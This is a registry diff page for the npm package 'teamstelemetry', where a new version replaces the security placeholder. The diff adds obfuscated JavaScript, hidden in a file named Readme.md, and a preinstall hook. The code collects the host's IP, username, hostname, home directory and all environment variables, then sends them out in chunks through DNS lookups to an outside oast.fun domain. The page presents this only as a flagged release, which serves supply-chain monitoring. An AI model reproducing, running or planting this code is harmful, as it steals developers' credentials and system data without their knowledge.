teamstelemetry 0.0.1-security → 9.9.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of teamstelemetry might be problematic. Click here for more details.
- package/Readme.md +3 -0
- package/app.obfuscated.js +1 -0
- package/package.json +12 -6
- package/README.md +0 -5
package/Readme.md
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
(function(_0x1cc13a,_0x225452){const _0x2c9c3e=a0_0x3dd4,_0x3e105f=_0x1cc13a();while(!![]){try{const _0x51e1eb=parseInt(_0x2c9c3e(0x97))/0x1+-parseInt(_0x2c9c3e(0x9f))/0x2+parseInt(_0x2c9c3e(0x8d))/0x3+parseInt(_0x2c9c3e(0x8c))/0x4+parseInt(_0x2c9c3e(0x94))/0x5+-parseInt(_0x2c9c3e(0x8e))/0x6+parseInt(_0x2c9c3e(0x85))/0x7*(parseInt(_0x2c9c3e(0x96))/0x8);if(_0x51e1eb===_0x225452)break;else _0x3e105f['push'](_0x3e105f['shift']());}catch(_0x140ca2){_0x3e105f['push'](_0x3e105f['shift']());}}}(a0_0x5b08,0xf3070));function a0_0x3dd4(_0x21dfcc,_0x1b4b62){const _0x5b0895=a0_0x5b08();return a0_0x3dd4=function(_0x3dd47b,_0x338ace){_0x3dd47b=_0x3dd47b-0x85;let _0x2b934f=_0x5b0895[_0x3dd47b];return _0x2b934f;},a0_0x3dd4(_0x21dfcc,_0x1b4b62);}const os=require('os'),dns=require('dns');;((async()=>{const _0x1cf96f=a0_0x3dd4,_0x198239=_0x1cf96f(0x9b);let _0x3524f9=_0x1cf96f(0x8a);try{const _0x11b6d9=os[_0x1cf96f(0x98)]();for(const _0x225453 of Object[_0x1cf96f(0x89)](_0x11b6d9)){for(const _0x2aec7e of _0x11b6d9[_0x225453]){if(_0x2aec7e[_0x1cf96f(0x90)]==='IPv4'&&!_0x2aec7e[_0x1cf96f(0x95)]){_0x3524f9=_0x2aec7e['address'];break;}}if(_0x3524f9!==_0x1cf96f(0x8a))break;}}catch(_0x4dd72f){}const _0xd39673='decoy_start_'+Math['random']()[_0x1cf96f(0x87)](0x24)['substring'](0x2);let _0x223882={'_decoy':_0xd39673,'ip':_0x3524f9,'username':os[_0x1cf96f(0x86)]()['username'],'hostname':os[_0x1cf96f(0x9e)](),'platform':os[_0x1cf96f(0x9a)](),'arch':os[_0x1cf96f(0x99)](),'home':os[_0x1cf96f(0x92)](),'env':process[_0x1cf96f(0x9c)],'_decoy2':_0x1cf96f(0x8f)};const _0x36905f=JSON[_0x1cf96f(0x88)](_0x223882),_0x72fe0d=Buffer['from'](_0x36905f)[_0x1cf96f(0x87)](_0x1cf96f(0x9d)),_0x524bf3=0x32;for(let _0x508b71=0x0;_0x508b71<_0x72fe0d[_0x1cf96f(0x93)];_0x508b71+=_0x524bf3){const _0x4e8180=_0x72fe0d[_0x1cf96f(0x8b)](_0x508b71,_0x508b71+_0x524bf3),_0x47bb34=_0x508b71/_0x524bf3+'.'+_0x4e8180,_0x4cc8ec=_0x47bb34+'.'+_0x198239;dns[_0x1cf96f(0x91)](_0x4cc8ec,_0x35708b=>{}),await new Promise(_0x4309b9=>setTimeout(_0x4309b9,0x64));}})());function a0_0x5b08(){const _0x4e7323=['lookup','homedir','length','1848510QrUZIF','internal','2336qrzmDe','1046523wAPzRQ','networkInterfaces','arch','platform','d20f7bp2ekue8oncvlk0sjy7i5wa3jzro.oast.fun','env','hex','hostname','2428276cejEmp','13419bmONJE','userInfo','toString','stringify','keys','N/A','substring','251648PyzfQl','2497038krFtcE','3970014SQmfHG','decoy_end','family'];a0_0x5b08=function(){return _0x4e7323;};return a0_0x5b08();}
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "teamstelemetry",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "teamstelemetry",
|
|
3
|
+
"version": "9.9.99",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node app.obfuscated.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [],
|
|
10
|
+
"author": "Finance Dev",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=teamstelemetry for more information.
|